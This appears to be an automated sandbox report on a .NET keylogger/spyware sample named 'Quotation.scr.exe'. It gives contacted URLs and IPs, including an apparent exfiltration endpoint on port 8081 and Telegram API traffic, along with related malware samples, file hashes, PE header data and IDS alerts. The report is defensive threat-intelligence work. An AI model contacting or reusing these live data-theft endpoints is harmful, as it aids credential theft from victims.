                    • Avira URL Cloud: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=enlBRegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    132.226.8.169
                    		checkip.dyndns.comUnited States
                    		16989UTMEMUSfalse
                    149.154.167.220
                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUtrue
                    188.114.96.3
                    		reallyfreegeoip.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    135.181.160.46
                    		eg-mart.comGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1507754
                    Start date and time:2024-09-09 08:54:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Quotation.scr.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/0@4/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 361
                    • Number of non-executed functions: 33
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target RegAsm.exe, PID 2432 because it is empty
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:55:16API Interceptor11765548x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    132.226.8.169Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Skrumle.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    CV-JOB REQUEST.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                    • checkip.dyndns.org/
                    FACTURA09.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    FACTURA_PDF.exeGet hashmaliciousGuLoaderBrowse
                    • checkip.dyndns.org/
                    Factura.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    149.154.167.220SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    66dcad8f5f33a_crypted.exeGet hashmaliciousMicroClip, RedLineBrowse
                                      IDMan.exeGet hashmaliciousFredy StealerBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        reallyfreegeoip.orgSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        api.telegram.orgSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                        • 149.154.167.220
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        66dcad8f5f33a_crypted.exeGet hashmaliciousMicroClip, RedLineBrowse
                                        • 149.154.167.220
                                        IDMan.exeGet hashmaliciousFredy StealerBrowse
                                        • 149.154.167.220
                                        checkip.dyndns.comSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELEGRAMRUSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                        • 149.154.167.220
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
                                        • 149.154.167.99
                                        s.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        • 149.154.167.99
                                        UTMEMUSReport Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        https://vigilantesecurity.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Distributrnets.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.lzh.lzh.lzh.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        CLOUDFLARENETUShttps://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/c16392c5-3f33-44df-b0b3-21de244d07c1?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuSAoQTcZBzKZHtH4uVLaC9IQ4Uu8Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        https://www.cognitoforms.com/Wetakethecake/WeTakeTheCake#vR_oiUXojzonA0D6pvtbQdYGiL6oaoT5xWL0wQgDDEc$*Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        https://darlin.com.au/Get hashmaliciousUnknownBrowse
                                        • 172.64.150.190
                                        https://eu-central-1.protection.sophos.com/?d=convertcontacts.com&u=aHR0cDovL21haWwuY29udmVydGNvbnRhY3RzLmNvbS9scy9jbGljaz91cG49dTAwMS4tMkZPZ2p2UDZlSEpMUThnRkNaWFFWYVdwSW9wc2R3cTcyQzhaR2p0eWFDYmt1U25VYkpra2g5YTVWdUxMZ3VQcTA2OFpPX2otMkIzT0FHSFlyemxyWGM0d1dHdkFlaXYtMkZNV2VJQTlOWk9iOTc0YS0yQlpvdnAxN0l5aGZoeWdhczFXVkJvMTNESUhrNWF5eEpuSHB6ZEdzeXI3SEJ4eE9ZVGxlZHp3R090RUNYcFJad0ljUC0yRlU2Um1RMlZZRS0yQm5lNU4zUTZMTHNQNXJRNTNyZi0yQmRGVFc4bThFTlNFdGI2dWFtLTJGR3NrQ3lZQjBVQ3oxalh1elAtMkYxb3BIQmxaaEF3YWI5ZHFmcXhVb3hXU0puWlh5eS0yRmtFS2FJLTJGSUU1eUhCQS0zRC0zRA==&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllMzg2&t=MzVESEtqZVpmK2lydmd6VlJBZ0dOd0VXaHNLamhvK21MK1pYQzM4L0JEUT0=&h=e14b286494664ef891348988c9e838b4&s=AVNPUEhUT0NFTkNSWVBUSVYoFOpcRSmtylFH3LId5iHD0shJ7qIqV8UAVy4ANYCuCYR3Alb2xoJLC7nF0vB_FDAfdi-bbhqFa2YYLKpVwPUnPTAMVQe9kqbfwYJ_E95MtwGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.45.208

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        3b5074b1b5d032e5620f69f9f700ff0epko_trans_details_20240909_105339#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        SKT ____202409_____6__.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        filz.exeGet hashmaliciousFormBookBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        rfqlastquaterproductpurchaseorderimportlist09.batGet hashmaliciousGuLoader, RemcosBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        uD9I18eLZ6.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, RedLine, zgRATBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        No created / dropped files found

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.432801846329874
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Quotation.scr.exe
                                        File size:6'144 bytes
                                        MD5:e0a5ee16dd5018801a0afadb2559b555
                                        SHA1:26443711531805d3e268212b552632558e90a015
                                        SHA256:6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
                                        SHA512:79b0405fcf1a4931867834278f771e5be1f1637bd8746a16934f6e6118ee6559dc546de2d3e912bb269e4e22e938d0b6599473813b6ca1de27623615110ae473
                                        SSDEEP:48:6gmEHl21SxTrP8tMVjKRHD8MB+MuER8YwNjkGlqLcyxwssJh7VeCtnUlaaIFWpfG:t2weW5OHN+2yBNjLScyxNGhQcczNt
                                        TLSH:5DC1D910A3F8437BDD720B719CB3A3406278F351995BCF9D1985214B3E53B918A53FA2
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'D.f.............................,... ...@....@.. ....................................`................................

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x402c8e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66DE4427 [Mon Sep 9 00:41:11 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2c380x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5a6.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xc940xe00dd5605ee7baf6ea3867e8966ac7f3f55False0.5415736607142857data5.040385941640028IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x40000x5a60x600ca94ddebdb95a1c56a83a191de7faac4False0.4173177083333333data4.075974040120256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x60000xc0x200880af27eaae1f8845d7921a8312b435fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x40a00x31cdata0.4321608040201005
                                        RT_MANIFEST0x43bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-09T08:55:16.251452+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649713132.226.8.16980TCP
                                        2024-09-09T08:55:17.251451+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649713132.226.8.16980TCP
                                        2024-09-09T08:55:17.814271+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649719188.114.96.3443TCP
                                        2024-09-09T08:55:18.642109+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649720132.226.8.16980TCP
                                        2024-09-09T08:55:21.173447+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649723132.226.8.16980TCP
                                        2024-09-09T08:55:23.548357+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649725132.226.8.16980TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 9, 2024 08:54:55.550035954 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:55.550084114 CEST44349710135.181.160.46192.168.2.6
